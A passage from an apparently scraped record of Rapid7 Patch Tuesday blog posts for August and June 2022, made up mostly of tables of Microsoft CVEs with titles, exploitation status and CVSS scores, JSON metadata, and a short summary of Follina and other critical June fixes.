\n[CVE-2022-34686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34686>) | Azure RTOS GUIX Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-35774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35774>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-35800](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35800>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-35787](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35787>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-35821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35821>) | Azure Sphere Information Disclosure Vulnerability | No | No | 4.4 | Yes \n[CVE-2022-35783](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35783>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.4 | Yes \n[CVE-2022-35812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35812>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.4 | Yes \n \n### Browser vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-33649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33649>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | No | No | 9.6 | Yes \n[CVE-2022-33636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33636>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-35796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35796>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-2624](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2624>) | Chromium: CVE-2022-2624 Heap buffer overflow in PDF | No | No | N/A | Yes \n[CVE-2022-2623](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2623>) | Chromium: CVE-2022-2623 Use after free in Offline | No | No | N/A | Yes \n[CVE-2022-2622](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2622>) | Chromium: CVE-2022-2622 Insufficient validation of untrusted input in Safe Browsing | No | No | N/A | Yes \n[CVE-2022-2621](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2621>) | Chromium: CVE-2022-2621 Use after free in Extensions | No | No | N/A | Yes \n[CVE-2022-2619](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2619>) | Chromium: CVE-2022-2619 Insufficient validation of untrusted input in Settings | No | No | N/A | Yes \n[CVE-2022-2618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2618>) | Chromium: CVE-2022-2618 Insufficient validation of untrusted input in Internals | No | No | N/A | Yes \n[CVE-2022-2617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2617>) | Chromium: CVE-2022-2617 Use after free in Extensions API | No | No | N/A | Yes \n[CVE-2022-2616](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2616>) | Chromium: CVE-2022-2616 Inappropriate implementation in Extensions API | No | No | N/A | Yes \n[CVE-2022-2615](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2615>) | Chromium: CVE-2022-2615 Insufficient policy enforcement in Cookies | No | No | N/A | Yes \n[CVE-2022-2614](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2614>) | Chromium: CVE-2022-2614 Use after free in Sign-In Flow | No | No | N/A | Yes \n[CVE-2022-2612](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2612>) | Chromium: CVE-2022-2612 Side-channel information leakage in Keyboard input | No | No | N/A | Yes \n[CVE-2022-2611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2611>) | Chromium: CVE-2022-2611 Inappropriate implementation in Fullscreen API | No | No | N/A | Yes \n[CVE-2022-2610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2610>) | Chromium: CVE-2022-2610 Insufficient policy enforcement in Background Fetch | No | No | N/A | Yes \n[CVE-2022-2606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2606>) | Chromium: CVE-2022-2606 Use after free in Managed devices API | No | No | N/A | Yes \n[CVE-2022-2605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2605>) | Chromium: CVE-2022-2605 Out of bounds read in Dawn | No | No | N/A | Yes \n[CVE-2022-2604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2604>) | Chromium: CVE-2022-2604 Use after free in Safe Browsing | No | No | N/A | Yes \n[CVE-2022-2603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2603>) | Chromium: CVE-2022-2603 Use after free in Omnibox | No | No | N/A | Yes \n \n### Developer Tools vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-35777](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35777>) | Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-35825](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35825>) | Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-35826](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35826>) | Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-35827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35827>) | Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-34716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34716>) | .NET Spoofing Vulnerability | No | No | 5.9 | Yes \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-30133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30133>) | Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-35744](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35744>) | Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-34691](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34691>) | Active Directory Domain Services Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-34714](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34714>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35745](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35745>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35752>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35753>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-34702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34702>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35767>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-34706](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34706>) | Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34707](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34707>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35768](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35768>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35756>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35751](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35751>) | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35795](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35795>) | Windows Error Reporting Service Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35820](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35820>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35750](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35750>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34713>) | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability | Yes | Yes | 7.8 | Yes \n[CVE-2022-35743](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35743>) | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35760>) | Microsoft ATA Port Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30194](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30194>) | Windows WebBrowser Control Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-35769](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35769>) | Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-35793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35793>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.3 | Yes \n[CVE-2022-34690](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34690>) | Windows Fax Service Elevation of Privilege Vulnerability | No | No | 7.1 | Yes \n[CVE-2022-35759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35759>) | Windows Local Security Authority (LSA) Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-35747](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35747>) | Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability | No | No | 5.9 | Yes \n[CVE-2022-35758](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35758>) | Windows Kernel Memory Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34708>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34701>) | Windows Secure Socket Tunneling Protocol (SSTP) Denial of Service Vulnerability | No | No | 5.3 | No \n \n### Exchange Server vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-21980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21980>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2022-24516](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24516>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2022-24477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24477>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2022-30134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30134>) | Microsoft Exchange Information Disclosure Vulnerability | No | Yes | 7.6 | Yes \n[CVE-2022-34692](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34692>) | Microsoft Exchange Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2022-21979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21979>) | Microsoft Exchange Information Disclosure Vulnerability | No | No | 4.8 | Yes \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-34717](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34717>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-33648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33648>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35742>) | Microsoft Outlook Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-33631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33631>) | Microsoft Excel Security Feature Bypass Vulnerability | No | No | 7.3 | Yes \n \n### System Center Azure vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-33640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33640>) | System Center Operations Manager: Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-34715](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34715>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-35804](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35804>) | SMB Client and Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-35761](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35761>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 8.4 | Yes \n[CVE-2022-35766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35766>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35794>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-34699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34699>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-33670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33670>) | Windows Partition Management Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34703](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34703>) | Windows Partition Management Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34696>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35746](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35746>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35749](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35749>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34705](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34705>) | Windows Defender Credential Guard Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35771](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35771>) | Windows Defender Credential Guard Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35762](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35762>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35763](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35763>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35764>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35765](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35765>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35792>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30144>) | Windows Bluetooth Service Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-35748](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35748>) | HTTP.sys Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-35755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35755>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.3 | Yes \n[CVE-2022-35757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35757>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | No | No | 7.3 | Yes \n[CVE-2022-35754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35754>) | Unified Write Filter Elevation of Privilege Vulnerability | No | No | 6.7 | Yes \n[CVE-2022-35797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35797>) | Windows Hello Security Feature Bypass Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-34709](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34709>) | Windows Defender Credential Guard Security Feature Bypass Vulnerability | No | No | 6 | Yes \n[CVE-2022-30197](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30197>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34710](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34710>) | Windows Defender Credential Guard Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34712](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34712>) | Windows Defender Credential Guard Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34704](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34704>) | Windows Defender Credential Guard Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34303](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34303>) | CERT/CC: CVE-20220-34303 Crypto Pro Boot Loader Bypass | No | No | N/A | Yes \n[CVE-2022-34302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34302>) | CERT/CC: CVE-2022-34302 New Horizon Data Systems Inc Boot Loader Bypass | No | No | N/A | Yes \n[CVE-2022-34301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34301>) | CERT/CC: CVE-2022-34301 Eurosoft Boot Loader Bypass | No | No | N/A | Yes \n \n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T19:34:51", "type": "rapid7blog", "title": "Patch Tuesday - August 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21979", "CVE-2022-21980", "CVE-2022-24477", "CVE-2022-24516", "CVE-2022-2603", "CVE-2022-2604", "CVE-2022-2605", "CVE-2022-2606", "CVE-2022-2610", "CVE-2022-2611", "CVE-2022-2612", "CVE-2022-2614", "CVE-2022-2615", "CVE-2022-2616", "CVE-2022-2617", "CVE-2022-2618", "CVE-2022-2619", "CVE-2022-2621", "CVE-2022-2622", "CVE-2022-2623", "CVE-2022-2624", "CVE-2022-30133", "CVE-2022-30134", "CVE-2022-30144", "CVE-2022-30175", "CVE-2022-30176", "CVE-2022-30190", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33631", "CVE-2022-33636", "CVE-2022-33640", "CVE-2022-33646", "CVE-2022-33648", "CVE-2022-33649", "CVE-2022-33670", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34685", "CVE-2022-34686", "CVE-2022-34687", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34692", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-34715", "CVE-2022-34716", "CVE-2022-34717", "CVE-2022-35742", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35772", "CVE-2022-35773", "CVE-2022-35774", "CVE-2022-35775", "CVE-2022-35776", "CVE-2022-35777", "CVE-2022-35779", "CVE-2022-35780", "CVE-2022-35781", "CVE-2022-35782", "CVE-2022-35783", "CVE-2022-35784", "CVE-2022-35785", "CVE-2022-35786", "CVE-2022-35787", "CVE-2022-35788", "CVE-2022-35789", "CVE-2022-35790", "CVE-2022-35791", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35796", "CVE-2022-35797", "CVE-2022-35799", "CVE-2022-35800", "CVE-2022-35801", "CVE-2022-35802", "CVE-2022-35804", "CVE-2022-35806", "CVE-2022-35807", "CVE-2022-35808", "CVE-2022-35809", "CVE-2022-35810", "CVE-2022-35811", "CVE-2022-35812", "CVE-2022-35813", "CVE-2022-35814", "CVE-2022-35815", "CVE-2022-35816", "CVE-2022-35817", "CVE-2022-35818", "CVE-2022-35819", "CVE-2022-35820", "CVE-2022-35821", "CVE-2022-35824", "CVE-2022-35825", "CVE-2022-35826", "CVE-2022-35827"], "modified": "2022-08-09T19:34:51", "id": "RAPID7BLOG:882168BD332366CE296FB09DC00E018E", "href": "https://blog.rapid7.com/2022/08/09/patch-tuesday-august-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T22:03:33", "description": "\n\nJune's Patch Tuesday sees Microsoft releasing fixes for over 60 CVEs. Top of mind for many administrators this month is [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>), also known as Follina, which was observed being exploited in the wild [at the end of May](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>). Microsoft provided [mitigation instructions](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) (disabling the MSDT URL protocol via the registry), but actual patches were not available until today\u2019s cumulative Windows Updates. Even if the mitigation was previously applied, installing the updates is highly recommended.\n\nNone of the other CVEs being addressed this month have been previously disclosed or seen exploited yet. However, it won\u2019t be long before attackers start looking at [CVE-2022-30136](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30136>), a critical remote code execution (RCE) vulnerability affecting the Windows Network File System (NFS). Last month, Microsoft fixed a similar vulnerability ([CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>)) affecting NFS v2.0 and v3.0. [CVE-2022-30136](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30136>), on the other hand, is only exploitable in NFS v4.1. Microsoft has provided mitigation guidance to disable NFS v4.1, which should only be done if the May updates fixing previous NFS versions have been applied. Again, even if the mitigation has been put into place, best to patch sooner rather than later.\n\nAlso reminiscent of last month is [CVE-2022-30139](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30139>), a critical RCE in LDAP carrying a CVSSv3 base score of 7.1, which again is only exploitable if the MaxReceiveBuffer LDAP policy value is set higher than the default. Rounding out the critical RCEs for June is [CVE-2022-30163](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30163>), which could allow a malicious application running on a Hyper-V guest to execute code on the host OS.\n\nThe other big news this month is the end of support for Internet Explorer 11 (IE11) on Windows 10 Semi-Annual Channels and Windows 10 IoT Semi-Annual Channels, as Microsoft encourages users to adopt the Chromium-based Edge browser (which saw fixes for 5 CVEs this month). Internet Explorer 11 on other versions of Windows should continue receiving security updates and technical support based on the OS support lifecycle, so this is only the beginning of the end for the legacy browser.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Apps vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-30168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30168>) | Microsoft Photos App Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### Azure vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-30137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30137>) | Azure Service Fabric Container Elevation of Privilege Vulnerability | No | No | 6.7 | Yes \n[CVE-2022-30177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30177>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30178>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30179>) | Azure RTOS GUIX Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30180>) | Azure RTOS GUIX Studio Information Disclosure Vulnerability | No | No | 7.8 | Yes \n \n### Azure System Center vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-29149](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29149>) | Azure Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Browser vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base 